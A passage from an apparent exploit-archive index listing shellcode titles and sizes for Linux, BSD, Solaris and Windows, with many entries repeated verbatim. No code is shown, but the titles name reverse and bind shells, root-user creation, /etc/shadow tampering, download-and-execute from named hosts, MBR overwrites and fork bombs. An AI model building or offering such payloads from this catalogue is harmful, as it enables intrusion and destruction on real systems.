(236 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes) Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes) Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) Linux/x86 - reboot() Shellcode (20 bytes) Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes) Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes) Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes) Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes) Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes) Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes) Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes) Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_ [/bin/sh_ NULL]) Shellcode (37 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes) Linux/x86 (Intel x86 CPUID) - execve /bin/sh XORED Encoded Shellcode (41 bytes) Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes) Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes) Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) Linux/x86 - reboot() Shellcode (20 bytes) Linux/x86 - setreuid(0_ 0) + execve /bin/sh Shellcode (31 bytes) Linux/x86 - execve /bin/sh + PUSH Shellcode (23 bytes) Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes) Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes) Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes) Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes) Linux/x86 - _exit(1); Shellcode (7 bytes) Linux/x86 - read(0_buf_2541); + chmod(buf_4755); Shellcode (23 bytes) Linux/x86 - write(0__Hello core!\n__12); Exit Shellcode (36/43 bytes) Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2) Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes) Linux/x86 - upload + exec Shellcode (189 bytes) Linux/x86 - setreuid + execve Shellcode (31 bytes) Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes) Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes) Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) Linux/x86 - execve code Shellcode (23 bytes) Linux/x86 - execve(_/bin/ash__0_0); Shellcode (21 bytes) Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes) Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) Linux/x86 - Kill Snort Shellcode (151 bytes) Linux/x86 - Execute At Shared Memory Shellcode (50 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) Linux/x86 - cp /bin/sh /tmp/katy ; + chmod 4555 katy Shellcode (126 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes) Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes) Linux/x86 - execve /bin/sh Shellcode (29 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3) Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes) Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) Linux/x86 - Add Root User Shellcode (104 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) Linux/x86 - Add Root User (z) Shellcode (70 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes) Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes) Linux/x86 - dup2(0_0) + dup2(0_1) + dup2(0_2) Shellcode (15 bytes) Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf() Shellcode (29 bytes) Linux/x86 - _exit(1) Shellcode (7 bytes) Linux/x86 - read(0_buf_2541) + chmod(buf_4755) Shellcode (23 bytes) Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes) Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - execve /bin/sh Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (2) Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (23 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (27 bytes) Linux/x86 - execve /bin/sh sysenter Opcode Array Payload Shellcode (45 bytes) Linux/x86 - Break chroot (../ 20x Loop) + execve /bin/sh Shellcode (66 bytes) Linux/x86 - upload + exec Shellcode (189 bytes) Linux/x86 - setreuid + execve Shellcode (31 bytes) Linux/x86 - Alphanumeric Encoded Shellcode (64 bytes) Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes) Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) Linux/x86 - execve code Shellcode (23 bytes) Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes) Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes) Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) Linux/x86 - Kill Snort Shellcode (151 bytes) Linux/x86 - Execute At Shared Memory Shellcode (50 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes) Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (82 bytes) Linux/x86 - execve /bin/sh Shellcode (29 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (3) Linux/x86 - execve /bin/sh Shellcode (38 bytes) Linux/x86 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes) Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes) Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) Linux/x86 - Add Root User Shellcode (104 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes) Linux/x86 - Break chroot (../ 10x Loop) Shellcode (46 bytes) Linux/x86 - Break chroot + execve /bin/sh Shellcode (80 bytes) Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes) Linux/x86 - execve /bin/sh XOR Encoded Shellcode (55 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) Linux/x86 - Add Root User (z) Shellcode (70 bytes) Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes) Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes) Linux/x86-64 - execve /bin/sh Shellcode (33 bytes) NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes) NetBSD/x86 - setreuid(0_ 0); + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes) NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes) SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes) SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes) Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes) Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes) Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) Windows x86 - Egg Omelet SEH Shellcode Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes) Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes) Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes) Windows x86 - ConnectBack + Download A File + Save + Execute Shellcode Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes) Windows x86 - Egg Omelet SEH Shellcode Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes) Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes) Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes) Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes) Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode Windows x86 - Download File + Execute Shellcode (192 bytes) Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes) Windows SP1/SP2 x86 - Beep Shellcode (35 bytes) Windows XP SP2 x86 - MessageBox Shellcode (110 bytes) Windows x86 - Command WinExec() Shellcode (104+ bytes) Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) Windows x86 - Download File + Execute Shellcode (192 bytes) Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes) Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes) Windows SP1/SP2 x86 - Beep Shellcode (35 bytes) Windows XP SP2 x86 - MessageBox Shellcode (110 bytes) Windows x86 - Command WinExec() Shellcode (104+ bytes) Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes) Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes) Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes) Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes) Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes) Windows - DCOM RPC2 Universal Shellcode Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Linux/x86 - Kill All Processes Shellcode (9 bytes) Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes) Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - execve Shellcode (51 bytes) Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes) Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes) Windows - DCOM RPC2 Universal Shellcode Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Linux/x86 - Kill All Processes Shellcode (9 bytes) Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes) Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - execve Shellcode (51 bytes) Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Windows XP SP3 x86 - ShellExecuteA Shellcode Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Windows XP SP3 x86 - ShellExecuteA Shellcode Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes) Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes) Windows XP SP2 x86 - calc.exe Shellcode (45 bytes) Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes) Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes) Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes) Linux/x86 - Fork Bomb Shellcode (6 bytes) (1) Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) Windows XP SP2 x86 (French) - calc Shellcode (19 bytes) Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F Shellcode (47 bytes) Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes) Linux/i686 - pacman -R Shellcode (59 bytes) Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes) Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes) Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (8 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2) Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Linux/x86 - Disable modsecurity Shellcode (64 bytes) Windows x86 - JITed Stage-0 Shellcode Windows x86 - JITed exec notepad Shellcode Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes) Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) Windows XP SP2 x86 (French) - calc Shellcode (19 bytes) Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes) Linux/x86 - ip6tables -F Shellcode (47 bytes) Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes) Linux/i686 - pacman -R Shellcode (59 bytes) Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes) Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes) Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (8 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2) Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes) Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes) Linux/x86 - Disable modsecurity Shellcode (64 bytes) Windows x86 - JITed Stage-0 Shellcode Windows x86 - JITed exec notepad Shellcode Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes) Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes) Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows x86 - MessageBox Shellcode (Metasploit) Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes) Windows x86 - MessageBox Shellcode (Metasploit) Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86 - DoS Badger Game Shellcode (6 bytes) Linux/x86 - DoS SLoc Shellcode (55 bytes) Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes) Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2) Linux/x86 - DoS Badger Game Shellcode (6 bytes) Linux/x86 - DoS SLoc Shellcode (55 bytes) Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes) Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes) Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes) Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x86-64 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes) Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes) Linux/x86 - Fork Bomb Shellcode (6 bytes) (2) Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes) Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes) Linux/x86-64 - execve /bin/sh Shellcode (30 bytes) Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes) Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes) Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes) Linux/x86 - Disable ASLR Security Shellcode (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes) Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes) Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes) Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes) Linux/x86 - Kill All Running Process Shellcode (11 bytes) Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes) Windows 7 x64 - cmd Shellcode (61 bytes) Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes) Linux/x86 - Hard Reboot Shellcode (29 bytes) Linux/x86 - Hard Reboot Shellcode (33 bytes) Linux/x86 - Disable ASLR Security Shellcode (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes) Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes) Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes) Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes) Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes) Linux/x86 - Kill All Running Process Shellcode (11 bytes) Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes) Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes) Windows 7 x64 - cmd Shellcode (61 bytes) Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes) Linux/x86 - Hard Reboot Shellcode (29 bytes) Linux/x86 - Hard Reboot Shellcode (33 bytes) Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes) Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes) Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes) Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes) Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes) Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes) Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes) Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); 